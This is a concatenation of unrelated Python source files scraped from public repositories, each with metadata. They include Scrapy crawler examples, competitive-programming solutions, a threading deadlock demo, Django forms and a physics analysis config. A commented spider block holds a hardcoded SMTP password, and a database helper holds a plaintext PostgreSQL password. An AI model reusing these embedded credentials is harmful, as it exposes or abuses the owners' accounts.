| 2023-07-10T05:21:15.163393 | 2023-06-29T14:02:35 | 2023-06-29T14:02:35 | 113,925,289 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,268 |
py
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
import scrapy
from scrapy_demo import items
from scrapy_demo import settings
import scrapy.settings
from scrapy.mail import MailSender
# 这是最普通的爬虫形式,
# class QuotesSpider(scrapy.Spider):
# name = "quotes"
# start_urls = [
# 'http://quotes.toscrape.com/page/1/',
# ]
#
# def parse(self, response):
# for quote in response.css('div.quote'):
# yield {
# 'text': quote.css('span.text::text').get(),
# 'author': quote.css('small.author::text').get(),
# 'tags': quote.css('div.tags a.tag::text').getall(),
# }
#
# next_page = response.css('li.next a::attr(href)').get()
# if next_page is not None:
# next_page = response.urljoin(next_page) # 这个urljoin 会用start_url中的域名。
# yield scrapy.Request(next_page, callback=self.parse)
# scrapy.follow 的形式,和Request的区别:不需要在urljoin一次,直接就是拼接好的url
# class QuotesSpider(scrapy.Spider):
# name = 'quotes'
# start_urls = [
# 'http://quotes.toscrape.com/tag/humor/',
# ]
#
# def parse(self, response):
# for quote in response.css('div.quote'):
# yield {
# 'author': quote.xpath('span/small/text()').get(),
# 'text': quote.css('span.text::text').get(),
# }
#
# next_page = response.css('li.next a::attr("href")').get()
# if next_page is not None:
# yield response.follow(next_page, self.parse)
# follow_all 的形式,然后加上另一个回调函数。
# class AuthorSpider(scrapy.Spider):
# name = 'author'
#
# start_urls = ['http://quotes.toscrape.com/']
#
# def parse(self, response):
# author_page_links = response.css('.author + a')
# yield from response.follow_all(author_page_links, self.parse_author)
#
# pagination_links = response.css('li.next a')
# yield from response.follow_all(pagination_links, self.parse)
#
# def parse_author(self, response):
# def extract_with_css(query):
# return response.css(query).get(default='').strip()
#
# yield {
# 'name': extract_with_css('h3.author-title::text'),
# 'birthdate': extract_with_css('.author-born-date::text'),
# 'bio': extract_with_css('.author-description::text'),
# }
#
#
# 在命令行中传入参数,然后重写start_request 这样就不用start_url
# class QuotesSpider(scrapy.Spider):
# name = "quotes"
#
# def start_requests(self):
# url = 'http://quotes.toscrape.com/'
# tag = getattr(self, 'tag', None)
# if tag is not None:
# url = url + 'tag/' + tag
# yield scrapy.Request(url, self.parse)
#
# def parse(self, response):
# for quote in response.css('div.quote'):
# yield {
# 'text': quote.css('span.text::text').extract_first(),
# 'author': quote.css('small.author::text').extract_first(),
# }
#
# next_page = response.css('li.next a::attr(href)').extract_first()
# if next_page is not None:
# next_page = response.urljoin(next_page)
# yield scrapy.Request(next_page, self.parse)
# class DianyingSpider(scrapy.Spider):
# MAIL_HOST = 'smtp.exmail.qq.com'
# MAIL_PORT = 25
# MAIL_USER = "[email protected]"
# MAIL_PASS = "6bH9KPQoKD"
# MAIL_TLS = False
# MAIL_SSL = False
#
# name = "dianying"
# start_urls = [
# "https://www.dy2018.com/html/gndy/dyzz/"
]
# 这是使用FEED exporter的默认配置选项。这里没有用到itemexporter的配置
# custom_settings = {
# 'FEED_URI': "file:///tmp/zzz.marshal",
# 'FEED_FORMAT': 'marshal',
# 'FEED_EXPORT_ENCODING':'utf8',
# 'FEED_EXPORT_FIELDS': ["url", "title"]
# }
# 程序入口
# def parse(self, response):
# mailer = MailSender(
# smtphost=settings.py.MAIL_HOST,
# smtpuser=settings.py.MAIL_USER,
# mailfrom=settings.py.MAIL_USER,
# smtppass=settings.py.MAIL_PASS,
# smtpport=settings.py.MAIL_PORT,
# smtptls=settings.py.MAIL_TLS,
# smtpssl=settings.py.MAIL_SSL,
# )
# mailer = MailSender.from_settings(self.settings.py)
#
# mailer.send(to=["[email protected]"], subject="北京新橙科技有限公司", body="Some body")
#
# # 遍历 最新电影 的所有页面
# for page in response.xpath("//select/option/@value").extract():
# url = "https://www.dy2018.com" + page
# self.logger.info('aaaaa %s' % url)
# yield scrapy.Request(url, callback=self.parsePage)
#
# # 处理单个页面
# def parsePage(self, response):
# # 获取到该页面的所有电影的详情页链接
# for link in response.xpath('//a[@class="ulink"]/@href').extract():
# url = "https://www.dy2018.com" + link
# self.logger.info('bbbbbb %s' % url)
# yield scrapy.Request(url, callback=self.parseChild)
#
# # 处理单个电影详情页
# def parseChild(self, response):
# # 获取电影信息,并提取数据
# item = items.DianyingItem()
# item['url'] = response.url
# item['title'] = response.xpath('//div[@class="title_all"]/h1/text()').extract()
# item['magnet'] = response.xpath('//div[@id="Zoom"]//a[starts-with(@href, "magnet:")]/@href').extract()
# self.logger.info('ccccc %s' % item)
# yield item
# itemloader 的形式
# class DianyingSpider(scrapy.Spider):
# name = "dianying"
# start_urls = [
# "https://www.dy2018.com/html/gndy/dyzz/"
# ]
#
# # 程序入口
# def parse(self, response):
# # 遍历 最新电影 的所有页面
# for page in response.xpath("//select/option/@value").extract():
# url = "https://www.dy2018.com" + page
# yield scrapy.Request(url, callback=self.parsePage)
#
# # 处理单个页面
# def parsePage(self, response):
# # 获取到该页面的所有电影的详情页链接
# for link in response.xpath('//a[@class="ulink"]/@href').extract():
# url = "https://www.dy2018.com" + link
# yield scrapy.Request(url, callback=self.parseChild)
#
#
# def parseChild(self, response):
# l = items.ArticleItemLoader(item=items.DianyingItem(), response=response)
# l.add_value('url', response.url)
# l.add_xpath('title', '//div[@class="title_all"]/h1/text()')
# l.add_xpath('magnet', '//div[@id="Zoom"]//img/@src')
# l.add_value('date', '20200611')
# l.add_value('name','fls')
# l.add_value('create_time','test')
# yield l.load_item()
#
# class DianyingSpider(scrapy.Spider):
#
# name = "dianying"
# start_urls = [
# "https://www.thepaper.cn/allGovUsers.jsp",
# ]
#
# def parse(self, response):
|
[
"[email protected]"
] | |
ec31acbdb0cf41622d1a325d3f894382ad8fd78f
|
d4fa331d7d8a00865f99ee2c05ec8efc0468fb63
|
/alg/remove_k_digits.py
|
f25427c08b7db78277402c25b6aa25fed1054238
|
[] |
no_license
|
nyannko/leetcode-python
|
5342620c789a02c7ae3478d7ecf149b640779932
|
f234bd7b62cb7bc2150faa764bf05a9095e19192
|
refs/heads/master
| 2021-08-11T04:11:00.715244 | 2019-02-05T15:26:43 | 2019-02-05T15:26:43 | 145,757,563 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 537 |
py
|
class Solution(object):
def removeKdigits(self, num, k):
"""
:type num: str
:type k: int
:rtype: str
"""
if len(num) <= k:
return '0'
stack = []
for i in num:
while stack and k > 0 and stack[-1] > i:
stack.pop()
k -= 1
stack.append(i)
# while k > 0:
# stack.pop()
# k -= 1
if k:
stack = stack[:-k]
return ''.join(stack).lstrip('0') or '0'
|
[
"[email protected]"
] | |
1f97596a4534396f4848c29caeee8100eb7f788e
|
de1abd0ebbb817aa5f23d369e7dda360fd6f1c32
|
/chapter3/scrapy/wikiSpider/wikiSpider/settings.py
|
9bf879252847b3f89efa7323e1c40f4f86ae3b30
|
[] |
no_license
|
CodedQuen/Web-Scraping-with-Python-
|
33aaa2e3733aa1f2b8c7a533d74f5d08ac868197
|
67f2d5f57726d5a943f5f044480e68c36076965b
|
refs/heads/master
| 2022-06-13T01:34:39.764531 | 2020-05-05T11:07:01 | 2020-05-05T11:07:01 | 261,435,932 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,258 |
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for wikiSpider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'wikiSpider'
SPIDER_MODULES = ['wikiSpider.spiders']
NEWSPIDER_MODULE = 'wikiSpider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'wikiSpider (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'wikiSpider.middlewares.WikispiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'wikiSpider.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'wikiSpider.pipelines.WikispiderPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"[email protected]"
] | |
ba1cba5c8a2a1b7898a46fb6a4abeebd84541336
|
51885da54b320351bfea42c7dd629f41985454cd
|
/abc075/c.py
|
18f98c98169acb0c09d089c7c2b89ef4b8bc0bd0
|
[] |
no_license
|
mskt4440/AtCoder
|
dd266247205faeda468f911bff279a792eef5113
|
f22702e3932e129a13f0683e91e5cc1a0a99c8d5
|
refs/heads/master
| 2021-12-15T10:21:31.036601 | 2021-12-14T08:19:11 | 2021-12-14T08:19:11 | 185,161,276 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,777 |
py
|
#
# abc075 c
#
import sys
from io import StringIO
import unittest
from collections import deque
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_入力例_1(self):
input = """7 7
1 3
2 7
3 4
4 5
4 6
5 6
6 7"""
output = """4"""
self.assertIO(input, output)
def test_入力例_2(self):
input = """3 3
1 2
1 3
2 3"""
output = """0"""
self.assertIO(input, output)
def test_入力例_3(self):
input = """6 5
1 2
2 3
3 4
4 5
5 6"""
output = """5"""
self.assertIO(input, output)
def resolve():
N, M = map(int, input().split())
AB = [list(map(int, input().split())) for _ in range(M)]
ans = 0
for i in range(M):
Target = AB[:]
Target.pop(i)
G = [[i+1, 0] for i in range(N)]
for ab in Target:
a, b = ab
G[a-1][1] += 1
G[b-1][1] += 1
G[a-1].append(b)
G[b-1].append(a)
F = [False] * N
Q = deque()
Q.append(1)
F[0] = True
while Q:
p = Q.pop()
if G[p-1][1] == 0:
continue
for np in G[p-1][2:]:
if F[np-1]:
continue
Q.append(np)
F[np-1] = True
for f in F:
if f == False:
ans += 1
break
print(ans)
if __name__ == "__main__":
# unittest.main()
resolve()
|
[
"[email protected]"
] | |
70e19baa27259958c38615665bee3f6c8ac77d48
|
b8cc6d34ad44bf5c28fcca9e0df01d9ebe0ee339
|
/入门学习/threading_dead_lock-eg.py
|
277a2b79b337003460067bedae3cb0eeca00cd29
|
[] |
no_license
|
python-yc/pycharm_script
|
ae0e72898ef44a9de47e7548170a030c0a752eb5
|
c8947849090c71e131df5dc32173ebe9754df951
|
refs/heads/master
| 2023-01-05T06:16:33.857668 | 2020-10-31T08:09:53 | 2020-10-31T08:09:53 | 296,778,670 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,591 |
py
|
"""
import threading
import time
lock_1 = threading.Lock()
lock_2 = threading.Lock()
def func_1():
print("func_1 starting......")
lock_1.acquire()
print("func_1 申请了 lock 1 ......")
time.sleep(2)
print("func_1 等待 lock_2 .......")
lock_2.acquire()
print("func_1 申请了 lock 2 ......")
lock_2.release()
print("func_1 释放了lock_2")
lock_1.release()
print("func_1 释放了lock_1")
print("func_1 done......")
def func_2():
time.sleep(3)
print("func_2 starting......")
lock_2.acquire()
print("func_2 申请了 lock 2 ......")
#将这个函数内的第一个sleep注释,然后将下面这个取消注释,就会出现死锁现象
#time.sleep(3)
print("func_2 等待 lock_1 .......")
lock_1.acquire()
print("func_2 申请了 lock 1 ......")
lock_1.release()
print("func_2 释放了lock_1")
lock_2.release()
print("func_2 释放了lock_2")
print("func_2 done......")
if __name__ == '__main__':
print("主程序启动............")
t1 = threading.Thread(target=func_1,args=())
t2 = threading.Thread(target=func_2,args=())
t1.start()
t2.start()
t1.join()
t2.join()
print("主程序结束。。。。。。。。。。")
"""
import threading
import time
lock_1 = threading.Lock()
lock_2 = threading.Lock()
def func_1():
print("func_1 starting......")
#给一个申请时间,如果超时就放弃
lock_1.acquire(timeout=4)
print("func_1 申请了 lock 1 ......")
time.sleep(2)
print("func_1 等待 lock_2 .......")
rst = lock_2.acquire(timeout=2)
if rst:
print("func_1已经得到锁lock_2")
lock_2.release()
print("func_1 释放了lock_2")
else:
print("func_1注定没申请到lock_2....")
lock_1.release()
print("func_1 释放了lock_1")
print("func_1 done......")
def func_2():
print("func_2 starting......")
lock_2.acquire()
print("func_2 申请了 lock 2 ......")
time.sleep(3)
print("func_2 等待 lock_1 .......")
lock_1.acquire()
print("func_2 申请了 lock 1 ......")
lock_1.release()
print("func_2 释放了lock_1")
lock_2.release()
print("func_2 释放了lock_2")
print("func_2 done......")
if __name__ == '__main__':
print("主程序启动............")
t1 = threading.Thread(target=func_1,args=())
t2 = threading.Thread(target=func_2,args=())
t1.start()
t2.start()
t1.join()
t2.join()
print("主程序结束。。。。。。。。。。")
|
[
"15655982512.com"
] |
15655982512.com
|
90d662d9b82ee1a8490bdc09aa96fc25d2c0ce6e
|
832852c679816673f708860929a36a20ca8d3e32
|
/Configurations/HighMass/Full2017/configuration_mm.py
|
1ee0bb7d5dbf9cfab8779a7973ed2065f8bd52d3
|
[] |
no_license
|
UniMiBAnalyses/PlotsConfigurations
|
c4ec7376e2757b838930dfb2615e1dc99a64e542
|
578fe518cfc608169d3418bcb63a8342d3a24390
|
refs/heads/master
| 2023-08-31T17:57:45.396325 | 2022-09-01T10:13:14 | 2022-09-01T10:13:14 | 172,092,793 | 0 | 13 | null | 2023-04-27T10:26:52 | 2019-02-22T15:52:44 |
Python
|
UTF-8
|
Python
| false | false | 905 |
py
|
# example of configuration file
treeName= 'Events'
tag = 'Full2017_mm'
# used by mkShape to define output directory for root files
outputDir = 'rootFile_'+tag
# file with TTree aliases
aliasesFile = 'aliases.py'
# file with list of variables
variablesFile = 'variables.py'
# file with list of cuts
cutsFile = 'cuts_ee_mm.py'
# file with list of samples
samplesFile = 'samples.py'
# file with list of samples
plotFile = 'plot.py'
# luminosity to normalize to (in 1/fb)
lumi = 41.5
# used by mkPlot to define output directory for plots
# different from "outputDir" to do things more tidy
outputDirPlots = 'plot_'+tag
# used by mkDatacards to define output directory for datacards
outputDirDatacard = 'datacards'
# structure file for datacard
#structureFile = 'structure.py' # Is this even needed still?
# nuisances file for mkDatacards and for mkShape
nuisancesFile = 'nuisances.py'
|
[
"[email protected]"
] | |
e1c8772a70ff0b7a5ead0b6c73d8adda9807dd1a
|
28c598bf75f3ab287697c7f0ff1fb13bebb7cf75
|
/testgame.mmo/genesis/spawn/spawnmain.py
|
d1a6e96ee033931ad1e1cf4df3507ff6d4965fc9
|
[] |
no_license
|
keaysma/solinia_depreciated
|
4cb8811df4427261960af375cf749903d0ca6bd1
|
4c265449a5e9ca91f7acf7ac05cd9ff2949214ac
|
refs/heads/master
| 2020-03-25T13:08:33.913231 | 2014-09-12T08:23:26 | 2014-09-12T08:23:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 338 |
py
|
import races
import animal
import npc
"""
#Critter Pack
#http://www.mmoworkshop.com/trac/mom/wiki/Store
"""
#import critters
"""
#Monster Pack Examples
#http://www.mmoworkshop.com/trac/mom/wiki/Store
"""
#import monsters
"""
Mythical Creature Pack Examples
http://www.mmoworkshop.com/trac/mom/wiki/Store
"""
#import mythical
|
[
"[email protected]"
] | |
0ce5054c29d7414e6c56e074af1b1ef1b32afe58
|
f95e73867e4383784d6fdd6a1c9fe06cffbfd019
|
/CheckIO/HOME/pawn_brotherhood.py
|
4b0929a05d3c3562eadcb0a6374c8a5fdf00444c
|
[] |
no_license
|
linxiaohui/CodeLibrary
|
da03a9ed631d1d44b098ae393b4bd9e378ab38d3
|
96a5d22a8c442c4aec8a064ce383aba8a7559b2c
|
refs/heads/master
| 2021-01-18T03:42:39.536939 | 2018-12-11T06:47:15 | 2018-12-11T06:47:15 | 85,795,767 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 554 |
py
|
#!/usr/bin/env python
# *-* coding:UTF-8 *-*
def safe_pawns(pawns):
cnt=0
for l in pawns:
col,row=l.lower()
if int(row)==1:
continue
if col>='b' and chr(ord(col)-1)+str(int(row)-1) in pawns or col<='g' and chr(ord(col)+1)+str(int(row)-1) in pawns:
cnt+=1
return cnt
if __name__ == '__main__':
#These "asserts" using only for self-checking and not necessary for auto-testing
assert safe_pawns({"b4", "d4", "f4", "c3", "e3", "g5", "d2"}) == 6
assert safe_pawns({"b4", "c4", "d4", "e4", "f4", "g4", "e5"}) == 1
|
[
"[email protected]"
] | |
6fef01c2498c9a9b7a52d8a294080b7fe61d6627
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/CJ/16_2_1_Dom_ju.py
|
c726b4de6450f76ad915989d09c20461a1c9a8cd
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 |
Python
|
UTF-8
|
Python
| false | false | 538 |
py
|
DOWNLOAD_DIR = "/Users/Dom/Downloads/"
def jopen( filename ):
return open( DOWNLOAD_DIR+filename+".in", "r")
def jout( filename, results, linebreaks=False ):
f = open(DOWNLOAD_DIR+filename+".out","w")
for n in range(len(results)):
f.write( "Case #" + str(n+1) + ": " )
if isinstance(n, list):
if linebreaks:
f.write( "\n" )
f.write( " ".join(n) )
else:
if linebreaks:
f.write( "\n" )
f.write( str(results[n]) + "\n" )
|
[
"[[email protected]]"
] | |
1e4f57cb7ae54552f4520fc68b828043c2167752
|
e41c10e0b17265509fd460f860306784522eedc3
|
/basic_config.py
|
8e0791dbf7f899d792c04ef3414e39b0ef1d7b41
|
[
"CC0-1.0"
] |
permissive
|
hyyc116/research_paradigm_changing
|
c77ecf2533a6b2e2cd3f74fc3d3073454bffc55c
|
eac69c45a7a17eb70ace185fa22831ac785e504e
|
refs/heads/master
| 2020-11-24T05:48:07.973347 | 2019-12-18T12:17:02 | 2019-12-18T12:17:02 | 227,992,284 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,102 |
py
|
#coding:utf-8
import os
import sys
import json
from collections import defaultdict
from collections import Counter
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
from sklearn.metrics import r2_score
import math
import numpy as np
import random
import logging
import networkx as nx
from itertools import combinations
import pylab
import itertools
from mpl_toolkits.mplot3d import Axes3D
from scipy.interpolate import spline
from multiprocessing.dummy import Pool as ThreadPool
from networkx.algorithms import isomorphism
from matplotlib import cm as CM
from collections import Counter
from scipy.signal import wiener
import matplotlib as mpl
from matplotlib.patches import Circle
from matplotlib.patheffects import withStroke
import matplotlib.colors as colors
from matplotlib.colors import LogNorm
from matplotlib.colors import LinearSegmentedColormap
from networkx.algorithms.core import core_number
from networkx.algorithms.core import k_core
import psycopg2
from cycler import cycler
import six
# from gini import gini
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',level=logging.INFO)
mpl.rcParams['agg.path.chunksize'] = 10000
color_sequence = ['#1f77b4', '#aec7e8', '#ff7f0e', '#ffbb78', '#2ca02c',
'#98df8a', '#d62728', '#ff9896', '#9467bd', '#c5b0d5',
'#8c564b', '#c49c94', '#e377c2', '#f7b6d2', '#7f7f7f',
'#c7c7c7', '#bcbd22', '#dbdb8d', '#17becf', '#9edae5']
mpl.rcParams['axes.prop_cycle'] = cycler('color', color_sequence)
# color = plt.cm.viridis(np.linspace(0.01,0.99,6)) # This returns RGBA; convert:
# hexcolor = map(lambda rgb:'#%02x%02x%02x' % (rgb[0]*255,rgb[1]*255,rgb[2]*255),
# tuple(color[:,0:-1]))
# mpl.rcParams['axes.prop_cycle'] = cycler('color', hexcolor)
params = {'legend.fontsize': 8,
'axes.labelsize': 8,
'axes.titlesize':10,
'xtick.labelsize':8,
'ytick.labelsize':8}
pylab.rcParams.update(params)
# from paths import *
def circle(ax,x,y,radius=0.15):
circle = Circle((x, y), radius, clip_on=False, zorder=10, linewidth=1,
edgecolor='black', facecolor=(0, 0, 0, .0125),
path_effects=[withStroke(linewidth=5, foreground='w')])
ax.add_artist(circle)
def autolabel(rects,ax,total_count=None,step=1,):
"""
Attach a text label above each bar displaying its height
"""
for index in np.arange(len(rects),step=step):
rect = rects[index]
height = rect.get_height()
# print height
if not total_count is None:
ax.text(rect.get_x() + rect.get_width()/2., 1.005*height,
'{:}\n({:.6f})'.format(int(height),height/float(total_count)),
ha='center', va='bottom')
else:
ax.text(rect.get_x() + rect.get_width()/2., 1.005*height,
'{:}'.format(int(height)),
ha='center', va='bottom')
class dbop:
def __init__(self,insert_index=0):
self._insert_index=insert_index
self._insert_values=[]
logging.debug("connect database with normal cursor.")
self._db = psycopg2.connect(database='core_data',user="buyi",password = "ruth_hardtop_isthmus_bubbly")
self._cursor = self._db.cursor()
def query_database(self,sql):
self._cursor.close()
self._cursor = self._db.cursor()
self._cursor.execute(sql)
logging.debug("query database with sql {:}".format(sql))
return self._cursor
def insert_database(self,sql,values):
self._cursor.close()
self._cursor = self._db.cursor()
self._cursor.executemany(sql,values)
logging.debug("insert data to database with sql {:}".format(sql))
self._db.commit()
def batch_insert(self,sql,row,step,is_auto=True,end=False):
if end:
if len(self._insert_values)!=0:
logging.info("insert {:}th data into database,final insert.".format(self._insert_index))
self.insert_database(sql,self._insert_values)
else:
self._insert_index+=1
if is_auto:
row[0] = self._insert_index
self._insert_values.append(tuple(row))
if self._insert_index%step==0:
logging.info("insert {:}th data into database".format(self._insert_index))
self.insert_database(sql,self._insert_values)
self._insert_values=[]
def get_insert_count(self):
return self._insert_index
def execute_del_update(self,sql):
self._cursor.execute(sql)
self._db.commit()
logging.debug("execute delete or update sql {:}.".format(sql))
def execute_sql(self,sql):
self._cursor.execute(sql)
self._db.commit()
logging.debug("execute sql {:}.".format(sql))
def close_db(self):
self._db.close()
def hist_2_bar(data,bins=50):
n,bins,patches = plt.hist(data,bins=bins)
return [x for x in bins[:-1]],[x for x in n]
|
[
"[email protected]"
] | |
fc9e559deb7f5bddce6f8748ac93e3cc190dfb31
|
0130533e0f40a0f1cf476f519a3673b10ceabff3
|
/teste/maximo.py
|
b0fd9c6f4d4edd354a14ef1c57bb97f12fe9654e
|
[] |
no_license
|
danielcanuto/revisao_python
|
d79c8fbf475e1cea12ca9719d02868666e0591db
|
3dbd2af74c7cc94f8e1962acb4069f40d0e71772
|
refs/heads/main
| 2023-03-02T04:37:30.777336 | 2021-02-11T11:16:54 | 2021-02-11T11:16:54 | 337,031,753 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 141 |
py
|
def maior(x, y):
if x > y:
return x
else:
return y
def maximo(x, y, z):
a = maior(x, y)
return maior(a, z)
|
[
"[email protected]"
] | |
abcfc7f85883e49ffa5113a31431886ddf533f5c
|
5b1b478b0e7b8069762855baa8a2a4f6ff48ebf4
|
/src/reviews/forms.py
|
bf83b29d371abc3b2b2686430c5fe69d7b383f5e
|
[
"MIT"
] |
permissive
|
junaidq1/greendot
|
9e4a0402fcee7182ca7531a0dd4a48edb43f79c5
|
cd9e7791523317d759e0f5f9cf544deff34a8c79
|
refs/heads/master
| 2020-04-06T06:54:07.994376 | 2016-09-11T18:33:15 | 2016-09-11T18:33:15 | 61,906,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,047 |
py
|
from django import forms
from .models import Review, Employee
from registration.forms import RegistrationFormUniqueEmail #this is to edit the registration redux form
# class ReviewForm(forms.ModelForm):
# class Meta:
# model = Review
# fields = [
# "content",
# "employee",
# "work_again",
# ]
#actual review post form
class ReviewForm2(forms.ModelForm):
class Meta:
model = Review
fields = ["length_working", "ques1", "ques2", "ques3","work_again", "content"]
# def content_clean(self):
# content = self.cleaned_data.get('content')
# print "jimmy"
# print len(content)
# if len(content) < 70:
# raise forms.ValidationError("Please provide a more impactful review")
# return content
#this form edits the registration redux form
class UserLevelRegistrationForm(RegistrationFormUniqueEmail):
LEVEL_CHOICES = (
('PPD', 'PPD'),
('BA', 'BA'),
('C', 'C'),
('SC', 'SC'),
('M', 'M'),
('SM', 'SM'),
('Other', 'other'),
)
OFFICE_CHOICES = (
('Kansas City', 'Kansas City'),
('Atlanta', 'Atlanta'),
('Austin', 'Austin'),
('Bengaluru', 'Bengaluru'),
('Boston', 'Boston'),
('Charlotte', 'Charlotte'),
('Chicago', 'Chicago'),
('Cincinnati', 'Cincinnati'),
('Cleveland', 'Cleveland'),
('Dallas', 'Dallas'),
('Denver', 'Denver'),
('Detroit', 'Detroit'),
('Gurgaon', 'Gurgaon'),
('Houston', 'Houston'),
('Los Angeles', 'Los Angeles'),
('McLean', 'McLean'),
('Miami', 'Miami'),
('Minneapolis', 'Minneapolis'),
('Mumbai', 'Mumbai'),
('New York City', 'New York City'),
('Orange County', 'Orange County'),
('Parsippany', 'Parsippany'),
('Philadelphia', 'Philadelphia'),
('Pittsburgh', 'Pittsburgh'),
('San Francisco', 'San Francisco'),
('Seattle', 'Seattle'),
('Other', 'other'),
)
ServiceArea_CHOICES = (
('S&O', 'S&O'),
('Tech', 'Tech'),
('Human Capital', 'Human Capital'),
)
level = forms.ChoiceField(choices=LEVEL_CHOICES, label="What is your level at the firm?")
office = forms.ChoiceField(choices=OFFICE_CHOICES, label="What office are you based out of?")
service_area = forms.ChoiceField(choices=ServiceArea_CHOICES, label="What Service Area are you a part of?")
# form to validate that person signing up knows the answer to the impact day question
class ValidationForm(forms.Form):
answer = forms.CharField()
class ContactForm(forms.Form):
username = forms.CharField(label="Please enter your username (if applicable)", required=False)
contact_email = forms.EmailField(label="Please provide a contact email")
message = forms.CharField(widget=forms.Textarea)
class AccessIssuesForm(forms.Form):
username = forms.CharField(label="Please enter your username", required=False)
contact_email = forms.EmailField(label="Please provide a contact email")
message = forms.CharField(label="Please describe the access issues you are having", widget=forms.Textarea)
class ReportDataForm(forms.Form):
DataReportChoices = (
('Incorrect', 'Incorrect practitioner data'),
('Missing', 'Missing practitioner data'),
)
data_issue = forms.ChoiceField(choices=DataReportChoices,
label="What kind of data issue would you like to report?")
practitioner_first_name = forms.CharField(label="First name of practitoner", max_length=120)
practitioner_last_name = forms.CharField(label="Last name of practitoner", max_length=120)
service_area = forms.CharField(label="Service Area of practitoner", max_length=120)
level = forms.CharField(label="Level of practitoner", max_length=120)
office = forms.CharField(label="Office of practitoner", max_length=120)
message = forms.CharField(label="Describe data issue", max_length=1500)
class PartnerForm(forms.Form):
service_area_options = (
('S&O', 'S&O'),
('Tech', 'Tech'),
('HCap', 'HCap'),
)
service_ar = forms.ChoiceField(choices=service_area_options,
label="What Service Area are you aligned with?")
message = forms.CharField(label="What makes you a good fit for the team?", widget=forms.Textarea)
contact_email = forms.EmailField(label="Email address")
|
[
"[email protected]"
] | |
e1c50ce55b94d0b8974045c6d12124d2db102332
|
21b39d50e4df56ea01453001845d1580729af1df
|
/jdcloud_sdk/services/redis/apis/DescribeClientListRequest.py
|
450146bb94baa2db571d11a497779f82c80cb4ac
|
[
"Apache-2.0"
] |
permissive
|
Tanc009/jdcloud-sdk-python
|
ef46eac7731aa8a1839b1fc1efd93249b7a977f0
|
8b045c99bc5b73ca7348e950b6f01e03a27982f5
|
refs/heads/master
| 2021-08-09T14:49:16.177709 | 2021-06-25T02:38:41 | 2021-06-25T02:38:41 | 141,714,695 | 0 | 0 |
Apache-2.0
